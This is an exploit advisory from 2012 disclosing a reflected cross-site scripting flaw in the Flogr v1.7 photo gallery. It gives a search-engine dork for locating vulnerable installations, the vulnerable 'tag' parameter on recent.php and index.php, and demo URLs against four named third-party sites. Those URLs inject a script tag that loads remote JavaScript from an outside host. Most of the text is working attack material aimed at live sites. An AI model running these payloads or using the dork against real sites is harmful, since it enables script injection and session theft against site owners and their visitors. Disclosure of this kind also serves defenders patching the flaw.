############################################################################################# # # # Exploit Title : Flogr V1.7 Xss Vulnerability # # # # Author : Iranian Security & Research Team # # # # Discovered By : Nafsh # # # # Home : sec-lab.ir # # # # Contact : research [at] sec-lab [dot] ir # # # # Date : 23/1/2012 - 16:00 # # # # Source : www.flogr.googlecode.com # # # # DorK : inurl:"tag=" "powered by flogr v1.7" # # # ############################################################################################# # # # Expl0iTs: # # # # http://[TARGET]/recent.php?tag=[xss] # # # # http://[TARGET]/index.php?tag=[xss] # # # ############################################################################################# # # # Dem0 : # # # # fotos.pecesama.net/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E # # # # localsrock.com/bigpictureproject/index.php?tag=<script src%3d//ckers.org/s></script> # # # # rowmanitoba.ca/flogr-1.7.2/recent.php?tag=<script src%3d//ckers.org/s></script> # # # # john.org.ua/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E # # # ############################################################################################# # # # We are : K0242 | Nafsh | Ehram.shahmohamadi # # # # Greetz : All sec-lab researchers # # # #############################################################################################